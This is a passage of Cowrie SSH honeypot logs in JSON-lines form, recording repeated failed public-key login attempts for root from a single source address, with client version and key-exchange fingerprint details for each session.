failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.144239Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.184168Z","src_ip":"212.227.125.160","session":"cb8dd07eaf5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43540,"dst_ip":"1.2.3.4","dst_port":22,"session":"f62b93d4e5d6","protocol":"ssh","message":"New connection: 212.227.125.160:43540 (1.2.3.4:22) [session: f62b93d4e5d6]","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.226026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.226916Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.269174Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.355958Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.357313Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.401784Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.402371Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.445719Z","src_ip":"212.227.125.160","session":"f62b93d4e5d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43554,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f2a2f50c7eb","protocol":"ssh","message":"New connection: 212.227.125.160:43554 (1.2.3.4:22) [session: 6f2a2f50c7eb]","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.485504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.486392Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.528767Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.612156Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.612804Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.654205Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"6e:ce:51:04:b9:f7:75:de:2d:68:6a:b2:3a:6f:30:20","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAABAEAwsFzinSlj2egX2w1f3F0UrJWtt8ywSUuU6qWF0AOWhTTSQlHK1L+3aWMDJJFs9CE649Ur+E/x/5Q4ZR8Vl3u4K/do1/Gy3M+S8nFEdqAYv8RPvtAbxw2YnbtezeE9RXwLazjRC4EY3BDMdlLqOJ5LlBZnw36dsEwxjODaJtrXW61cV9VOuTcKr8VeBeOWw3n4DWFKES45QBI2OVyb4c0IcdgbJKJkRla/GqZVwPgK4YlkZg+LNhVk/TUtb5xWAWFCA9cXyIAHgYp83byluaA9+jHydXWpERLQtkw7Ea4V0O9FlHX34PYntLp10onBFKHgLvVz+Moxbe4vOi/c396LWd2b1XwqqWuXRyLp0YKcHwr9/A6NsTZCxWCQfXdw0l+86h/rW0CXgJXINhnkuYqO5QLIYCPMs08wqYd84ga/72tDYcAIq7Ga8Rl9nbV2Zs4h4YQ40lFsf0ou1EzgWoI4rrQLSXKvr5inBLTXG7zkIutGyM74EHio6hOGrSQgW47o8EtrctI/MAwjQJqnbHtfftZNCuAP+qKCsVEyG/LEG601r1JsW00Zl84ew5SEOzqE0CjJWGzT1T67+UNRWlIISIphJCi1+VTNykQHrfq1210VswCNKO10YNZRVS7VEbJY/Y7ea1b4q/VcDH/rE6ncDYcbfoBgEsW9ADZkZ7WV97yExIpnJDeoYBG27AQWkZL8bN8WZJ20doPvvxQyxI6go3l9LkXWNm3jFIdnqSCgLQvFz/UCtjtDxmnIzdNRN+B0QchMzRyir+iwBRdF9LCco31HkOQvGFfD7irXNbfzQ7TzFOYm2e9fcb3Hu/BYunpRNsz/k3OPtkRkpvFyjxnu1bISWI1/z/YMVnT9AnWuKztZfkwkOWyVpo1AswBwfz6CLCC29khQNKNOjuXAcCRMg2dem90QlgbM2H+qNlgbhiJHBAicvjrDU1dzQehUALRDP/ruPc2J1e8BGcsc4lr7qF0e/HjxF68rRZP7e9gIit1EYnm8Vh5KlY7dHbz1Canek5DijZAp0HiEM+W35QB8lvuUFXPS1rC2Uh5yevJXucm2jZvGlmKx69BhUmJn1yPwXu37bqxXAApKZLUkVdjC6K4esjSgBc1KHEAGGR5PbBC3gjlR3I91n+290kWxln3SRjYWrNd0n4LTzmij92gmQzI5jMV49cCgqyxgCd49HhVLUpZ50O1IgLqTgu0uf/fueQtVho/JoQy1pvvAIPt03qJwi1OG48GDlONEhZqms1wpXXng8RTDTTl44lbSB7TN3HB9bZmnpb5Eyc0Wt8srkFn2GFDcrLIU3PHjGTRwZzqEZK5V9jhNg46ZRgFLRPt2RmYQNLjIaLWgqQeDSWO3Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.654978Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.696796Z","src_ip":"212.227.125.160","session":"6f2a2f50c7eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43562,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecbc28c2341f","protocol":"ssh","message":"New connection: 212.227.125.160:43562 (1.2.3.4:22) [session: ecbc28c2341f]","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.738819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.744835Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.781517Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.909379Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.909985Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.953414Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.954052Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:37.997181Z","src_ip":"212.227.125.160","session":"ecbc28c2341f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43568,"dst_ip":"1.2.3.4","dst_port":22,"session":"9684eb93d909","protocol":"ssh","message":"New connection: 212.227.125.160:43568 (1.2.3.4:22) [session: 9684eb93d909]","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.038848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.040572Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-